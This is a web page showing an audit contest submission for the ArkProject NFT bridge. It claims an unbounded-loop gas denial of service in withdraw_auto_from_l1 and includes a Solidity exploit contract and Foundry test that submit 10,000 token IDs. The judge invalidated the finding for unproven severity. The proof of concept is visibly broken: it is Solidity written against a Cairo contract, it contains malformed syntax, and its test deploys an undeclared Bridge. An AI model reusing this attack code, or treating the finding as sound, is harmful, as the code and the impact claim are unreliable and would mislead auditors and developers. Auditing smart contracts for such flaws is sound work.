ArkProject: NFT Bridge
ArkProject
NFTBridge
60,000 USDC
View results
Previous Next
Submission Details
Severity: low
Invalid

Unbounded Loops in Functions on Bridge.cairo:: withdraw_auto_from_l1

sidhack3r11

Summary

https://github.com/Cyfrin/2024-07-ark-project/blob/main/apps/blockchain/starknet/src/bridge.cairo

The functions withdraw_auto_from_l1 and deposit_tokens contain loops that iterate over token IDs provided in requests. These loops do not have a cap on the number of iterations, allowing an attacker to create requests with an extremely large number of token IDs.

Vulnerability Details

An attacker can submit a request with a very large number of token IDs, causing the loops to consume an excessive amount of gas. This can lead to transactions exceeding the block gas limit, making it impossible to complete the function execution and preventing legitimate users from processing their requests.

Here is a Solidity contract that exploits the vulnerability:

// SPDX-License-Identifier: MIT\
pragma solidity ^0.8.0;
import "forge-std/Test.sol";\
import "forge-std/console.sol";
interface IBridge {\
function withdraw\_auto\_from\_l1(address from\_address, Request calldata req) external;\
}
struct Request {\
uint256\[] ids;\
address owner\_l2;\
bytes uris;\
bytes name;\
bytes symbol;\
bytes base\_uri;\
bytes header;\
bytes hash;\
address collection\_l1;\
address collection\_l2;\
address owner\_l1;\
address\[] new\_owners;\
bytes values;\
}
contract Exploit is Test {\
IBridge bridge;
constructor(address _bridge) {
bridge = IBridge(_bridge);
}
function attack() public {
// Create a large list of token IDs to exploit the loop
uint256[] memory tokenIds = new uint256[](10000);
for (uint256 i = 0; i < 10000; i++) {
tokenIds[i] = i;
}
// Construct the Request struct
Request memory req = Request({
ids: tokenIds,
owner_l2: address(this),
uris: "",
name: "",
symbol: "",
base_uri: "",
header: "",
hash: "",
collection_l1: address(0),
collection_l2: address(0),
owner_l1: address(0),
new_owners: new address ,
values: ""
});
// Call the vulnerable function
bridge.withdraw_auto_from_l1(address(this), req);
}
}

A Foundry test script to deploy the vulnerable contract, deploy the exploit contract, and perform the attack.

// SPDX-License-Identifier: MIT\
pragma solidity ^0.8.0;
import "forge-std/Test.sol";\
import "./Exploit.sol";
contract ExploitTest is Test {\
IBridge bridge;\
Exploit exploit;
function setUp() public {
// Deploy the vulnerable contract
bridge = new Bridge();
// Deploy the exploit contract
exploit = new Exploit(address(bridge));
}
function testAttack() public {
// Execute the attack
exploit.attack();
}
}

This code demonstrates how an attacker can exploit the unbounded loop in the withdraw_auto_from_l1 function to cause a DoS attack. The exploit contract constructs a request with a large number of token IDs and calls the vulnerable function, consuming excessive gas and potentially exhausting the block gas limit. The Foundry test script deploys both the vulnerable and exploit contracts and executes the attack.

By running this test, you can observe the effects of the attack and verify the vulnerability. This approach can be extended to test other identified vulnerabilities and their potential exploits.

Impact

An attacker can exploit the unbounded loop to consume excessive gas. This can lead to transaction failures or exhaust the block gas limit, making the function unusable. This kind of disruption can significantly affect the contract's availability, especially if the function is crucial for operations such as token withdrawals.

Users may not be able to perform essential actions, leading to operational issues and potential financial impact due to the inability to withdraw tokens

Tools Used

Manual review

Recommendations

Updates

Lead Judging Commences

n0kto Lead Judge 10 months ago
Submission Judgement Published
Invalidated
Reason: Non-acceptable severity
Assigned finding tags:

Informational / Gas

Please, do not suppose impacts, think about the real impact of the bug and check the CodeHawks documentation to confirm: https://docs.codehawks.com/hawks-auditors/how-to-determine-a-finding-validity A PoC always helps to understand the real impact possible.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.